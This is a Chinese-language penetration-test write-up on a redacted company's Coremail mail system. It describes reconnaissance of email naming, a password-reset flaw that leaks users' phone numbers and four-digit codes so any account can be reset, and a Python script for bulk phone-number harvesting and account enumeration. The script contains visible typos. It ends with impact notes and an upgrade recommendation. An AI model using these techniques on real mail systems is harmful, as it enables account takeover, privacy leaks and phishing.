目前分析
1、地址:https://mail.*****com/coremail/
分析:
登录功能和忘记密码功能;
目前站点是邮箱系统。方向:爆破、逻辑漏洞-密码找回
信息收集
1、google通过域名收集相关网站获取邮箱信息,inur:***
2.经过多个邮箱信息收集,发现邮箱命名规则
密码找回
输入获取到的邮箱,点击获取邮箱的手机号码,并进行 抓放
返回绑定的手机号码,信息泄露,如果失败时返回错误的
在点击 【获取短信内容】,发现有个**code的内容,四位数,可能是验证码,把这个验证码输入进去,成功了。 [是它是它,就是它]
输入验证码,下一步成功了,说明是正确的,重置任意账户邮箱密码
PYTHON可批量获取手机号码
1、收集当前公司员工名字转换成拼音
2、手机公布的邮箱信息
只是简单写一下获取手机号码 判断邮箱用户真实
import requestsimport json'''通过邮箱转换批量获取手机号码和获取正确的邮箱'''headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/0101 Firefox/76.0','Accept': '*/*','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Connection': 'close','Origin':'https://mail.******.com','Referer':'https://mail.******.com/coremail/changepwd.jsp?uid=','Host':'crm.******.com:80','Content-Length': '61'}def poststrfox():name='***name'mail=name+'@******.com'data = {'mail': mail,'lyPass': 'q76a5e96JIQwRMqTTtzWMA=='}url='https://crm.******.com:80/getPhone'req = requests.port(url=url,data=data,headers=headers)rtext = req.textdic_jsdict = json.loads(rtext) #返回的是json格式的,所以需要转换一下message = dic_jsdict['message']print(message, '|', mail)poststrfox()
危害/修复:
1、可以爆破获取用户名
2、通过用户可以获取手机号码,信息泄露
3、可以重置任意账户邮箱密码,包括高管的邮箱手机号码,获取邮箱权限,可干的事情很多,钓鱼等。
修复建议
升级当前邮件系统